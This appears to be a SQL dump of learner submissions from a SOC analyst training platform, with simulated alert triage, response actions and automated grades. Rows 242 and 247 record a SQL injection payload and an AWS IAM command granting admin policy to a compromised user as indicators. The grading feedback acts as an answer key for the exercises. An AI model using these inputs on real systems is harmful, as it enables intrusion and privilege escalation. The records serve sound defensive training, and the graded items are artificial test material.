(174, 95, 227, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_2\",\"artifact_3\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"escalate\",\"collect_forensics\",\"reset_credentials\",\"block_hash\",\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"test\",\"submitted_at\":\"2026-01-21T18:53:10.865Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-21 18:44:37', '2026-01-31 21:00:01', 0, NULL),
(175, 95, 269, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-21 18:59:04', '2026-01-21 18:59:04', 0, NULL),
(179, 34, 607, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-22T03:11:59.323Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-22 03:11:21', '2026-01-31 21:00:01', 0, NULL),
(182, 96, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-22 04:14:25', '2026-01-22 04:14:25', 0, NULL),
(183, 96, 621, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-22T04:16:29.689Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-22 04:14:42', '2026-01-31 21:00:01', 0, NULL),
(184, 96, 226, 'investigating', NULL, NULL, NULL, NULL, '2026-01-22 09:46:47', '2026-01-22 06:36:47', '2026-01-22 06:36:47', 0, NULL),
(187, 56, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-23 06:03:09', '2026-01-23 06:03:09', 0, NULL),
(188, 42, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-23 08:19:36', '2026-01-23 08:19:36', 0, NULL),
(190, 97, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 05:05:04', '2026-01-25 05:05:04', 0, NULL),
(191, 98, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 08:18:38', '2026-01-25 08:18:38', 0, NULL),
(192, 98, 282, 'investigating', NULL, NULL, NULL, NULL, '2026-01-25 11:45:46', '2026-01-25 08:37:46', '2026-01-25 08:37:46', 0, NULL),
(193, 99, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 15:14:16', '2026-01-25 15:14:16', 0, NULL),
(195, 74, 1086, 'investigating', NULL, NULL, NULL, NULL, '2026-01-25 19:28:41', '2026-01-25 16:19:41', '2026-01-25 16:19:41', 0, NULL),
(196, 102, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-25 21:55:00', '2026-01-25 21:55:00', 0, NULL),
(197, 107, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-27 19:45:55', '2026-01-27 19:45:55', 0, NULL),
(198, 108, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-27 19:55:53', '2026-01-27 19:55:53', 0, NULL),
(199, 109, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-27 21:08:02', '2026-01-27 21:08:02', 0, NULL),
(200, 107, 233, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"Confirmed phishing incident involving a spoofed banking domain and malicious credential-harvesting URL. \\nIOCs (IP, URL, sender domain) were enriched via OSINT and validated as malicious. \\nActivity mapped to MITRE ATT&CK T1566. \\nContainment actions included blocking the IP/domain and forcing credential reset for the affected user.\\nVerdict: True Positive.\\n\",\"submitted_at\":\"2026-01-28T15:04:50.937Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"block_url\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-28 14:35:51', '2026-01-31 21:00:01', 0, NULL),
(201, 107, 224, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_2\",\"artifact_4\",\"artifact_5\",\"artifact_6\",\"artifact_7\",\"artifact_8\",\"artifact_3\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Encoded PowerShell activity and a known malicious IP were identified, confirming an active C2 communication attempt. OSINT and hash analysis verified malware presence. Affected host and account were contained to prevent further compromise.\\n\\nVerdict: True Positive.\",\"submitted_at\":\"2026-01-28T16:29:47.262Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-28 15:35:44', '2026-01-31 21:00:01', 0, NULL),
(202, 115, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-31 12:38:02', '2026-01-31 12:38:02', 0, NULL),
(203, 116, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-01 09:07:07', '2026-02-01 09:07:07', 0, NULL),
(204, 116, 1104, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-01T09:11:43.826Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)\",\"missed_items\":[\"isolate_host\",\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-01 09:09:51', '2026-02-28 21:00:00', 0, NULL),
(205, 116, 1105, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-01 09:11:43', '2026-02-01 09:11:43', 0, NULL),
(206, 123, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-02 10:07:03', '2026-02-02 10:07:03', 0, NULL),
(207, 124, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-02 10:09:53', '2026-02-02 10:09:53', 0, NULL),
(208, 125, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-04 01:34:01', '2026-02-04 01:34:01', 0, NULL),
(209, 126, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-04 22:06:35', '2026-02-04 22:06:35', 0, NULL),
(210, 74, 1141, 'investigating', NULL, NULL, NULL, NULL, '2026-02-05 11:34:26', '2026-02-05 08:26:26', '2026-02-05 08:26:26', 0, NULL),
(211, 65, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-05 16:49:25', '2026-02-05 16:49:25', 0, NULL),
(212, 65, 636, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-05T17:01:34.233Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-05 16:52:31', '2026-02-28 21:00:00', 0, NULL),
(213, 127, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-05 17:48:46', '2026-02-05 17:48:46', 0, NULL),
(215, 128, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-07 01:17:23', '2026-02-07 01:17:23', 0, NULL),
(216, 129, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-07 21:51:46', '2026-02-07 21:51:46', 0, NULL),
(217, 129, 949, 'investigating', NULL, NULL, NULL, NULL, '2026-02-08 01:02:48', '2026-02-07 21:52:48', '2026-02-07 21:52:48', 0, NULL),
(218, 131, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-08 08:16:29', '2026-02-08 08:16:29', 0, NULL),
(219, 133, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-08 16:07:44', '2026-02-08 16:07:44', 0, NULL),
(220, 135, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-08 17:42:27', '2026-02-08 17:42:27', 0, NULL),
(221, 136, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-09 22:07:29', '2026-02-09 22:07:29', 0, NULL),
(222, 136, 1225, 'investigating', NULL, NULL, NULL, NULL, '2026-02-10 01:20:43', '2026-02-09 22:12:43', '2026-02-09 22:12:43', 0, NULL),
(223, 137, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-10 12:44:50', '2026-02-10 12:44:50', 0, NULL),
(225, 138, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-203.0.113.45\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-11T17:09:07.813Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_hash\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-11 17:02:53', '2026-02-28 21:00:00', 0, NULL),
(226, 140, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"Subject identified as True Positive. Suspicious email contained malware detected by OSINT scan. Hash was identified to be malicious. Senders IP address is known to be associated with phishing organization. IP address was blocked on Firewall. Hash was also blocked on all host machines.\",\"submitted_at\":\"2026-02-11T17:16:22.373Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-11 17:05:54', '2026-02-28 21:00:00', 0, NULL),
(227, 138, 269, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-11 17:09:07', '2026-02-11 17:09:07', 0, NULL),
(228, 140, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"ip-192.168.1.45\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Subject is True Positive. The file hash is identified as Malicious. Senders IP address has been identified and is associated with malicious behavior and common phishing campaigns. Host has been quarantined. Senders IP address has been blacklisted in firewall. File hash has been blocked on all hosts. Escalated issue.\",\"submitted_at\":\"2026-02-11T17:33:57.651Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-11 17:16:22', '2026-02-28 21:00:00', 0, NULL),
(229, 140, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-11 17:33:57', '2026-02-11 17:33:57', 0, NULL),
(230, 141, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-12 03:16:23', '2026-02-12 03:16:23', 0, NULL),
(231, 141, 729, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.20\",\"hash-e99a18c4\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"Based on the artifacts provided, this is assessed as a True Positive malware infection on internal host 10.0.0.20. The file path, executable type, and hash artifact collectively indicate malicious activity requiring containment and further forensic investigation.\\n\\nImmediate response and broader IOC hunting are advised.\",\"submitted_at\":\"2026-02-12T04:13:30.182Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command C:\\\\malicious_folder\\\\malware.exe (1/2). Missed response actions (3/4)\",\"missed_items\":[\"command: C:\\\\malicious_folder\\\\malware.exe\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-12 04:07:49', '2026-02-28 21:00:00', 0, NULL),
(232, 141, 253, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-203.0.113.45\",\"hash-abc123de\",\"domain-malicious-ex\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"On 2023-10-01 at 14:23:45 UTC, the Security Operations Center detected a process execution event on internal workstation DESKTOP-1A2B3C (192.168.1.101) associated with user account jdoe. The executed process (hash: abc123def456ghi789jkl012mno345pq) initiated outbound communication to external IP 203.0.113.45 and resolved domain malicious-example.com.\\nGiven the active outbound connection, the incident is assessed as a High-Severity True Positive. The affected endpoint was isolated to prevent lateral movement, and the associated IP, domain, and file hash were blocked at perimeter and endpoint controls. User credentials for jdoe are under review pending validation of potential compromise.\",\"submitted_at\":\"2026-02-12T04:18:58.336Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-12 04:14:28', '2026-02-28 21:00:00', 0, NULL),
(233, 141, 957, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.77\",\"ip-10.0.0.5\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"On 2026-01-16 at 17:55:00 UTC, the SOC detected a network connection attempt originating from external IP 203.0.113.77 targeting internal asset secure-server (10.0.0.5) using the privileged account “admin.” Likely True Positive unauthorized access attempt and classified as Medium–High severity pending further log correlation. All attempts failed. Preventative measures, including verification of firewall rules, potential IP blocking, and validation of privileged account protections (e.g., MFA enforcement), are recommended to mitigate ongoing risk\",\"submitted_at\":\"2026-02-12T04:25:05.765Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-12 04:19:44', '2026-02-28 21:00:00', 0, NULL),
(234, 137, 239, 'investigating', NULL, NULL, NULL, NULL, '2026-02-13 02:53:11', '2026-02-12 23:43:11', '2026-02-12 23:43:11', 0, NULL),
(235, 137, 687, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.26.102\",\"ip-192.168.1.10\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-13T00:04:15.388Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-12 23:59:29', '2026-02-28 21:00:00', 0, NULL),
(236, 137, 229, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"hash-e99a18c4\",\"artifact_1\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"reset_credentials\",\"isolate_host\",\"escalate\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"Hash value detected as malware, and the user account has multiple failed login attempts. \",\"submitted_at\":\"2026-02-13T13:10:32.657Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-13 00:05:11', '2026-02-28 21:00:00', 0, NULL),
(237, 142, 268, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:16:16 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:16:28.583Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-14 06:28:27', '2026-03-07 05:16:28', 0, NULL),
(238, 142, 1234, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.45.12\",\"ip-203.0.113.89\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-14T06:32:08.123Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/5)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-14 06:29:28', '2026-02-28 21:00:00', 0, NULL),
(239, 145, 954, 'investigating', NULL, NULL, NULL, NULL, '2026-02-14 12:48:14', '2026-02-14 09:40:14', '2026-02-14 09:40:14', 0, NULL),
(240, 95, 252, 'investigating', NULL, NULL, NULL, NULL, '2026-02-14 18:05:55', '2026-02-14 14:55:55', '2026-02-14 14:55:55', 0, NULL),
(241, 153, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-15 01:39:11', '2026-02-15 01:39:11', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(242, 99, 640, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.45\",\"ip-192.168.1.20\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 16/02/2026, 22:05:35\\nALERT: SQL Injection Attempt Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.45\\n- [IP] 192.168.1.20\\n- [PAYLOAD] \' OR \'1\'=\'1\' --\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-16T17:06:58.731Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-15 05:10:28', '2026-02-28 21:00:00', 0, NULL),
(243, 159, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-15 23:22:22', '2026-02-15 23:22:22', 0, NULL),
(244, 159, 953, 'investigating', NULL, NULL, NULL, '{\"verdict_correctness\":\"Incorrect\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Missed response actions (0/1)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-15 23:26:27', '2026-02-15 23:30:42', 0, NULL),
(245, 60, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-16 06:05:50', '2026-02-16 06:05:50', 0, NULL),
(246, 165, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-16 17:39:33', '2026-02-16 17:39:33', 0, NULL),
(247, 165, 756, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.77\",\"cmd-1\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 16/2/2026, 11:16:05 pm\\nALERT: Unauthorized IAM Privilege Escalation Attempt\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.77\\n- [COMMAND] aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-16T17:46:11.348Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"audit_user_activity\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-16 17:45:13', '2026-02-28 21:00:00', 0, NULL),
(248, 45, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 02:54:23', '2026-02-17 02:54:23', 0, NULL),
(249, 166, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 15:29:09', '2026-02-17 15:29:09', 0, NULL),
(250, 108, 1235, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 17:17:01', '2026-02-17 17:17:01', 0, NULL),
(251, 157, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-17 22:29:14', '2026-02-17 22:29:14', 0, NULL),
(252, 169, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.15\",\"ip-192.168.1.100\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:20:44 AM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:20:57.487Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:17:18', '2026-02-28 21:00:00', 0, NULL),
(253, 169, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"reset_credentials\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:22:55 AM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:23:00.723Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_ip\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:20:57', '2026-02-28 21:00:00', 0, NULL),
(254, 169, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/18/2026, 10:24:20 AM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-18T07:24:25.229Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-18 07:23:00', '2026-02-28 21:00:00', 0, NULL),
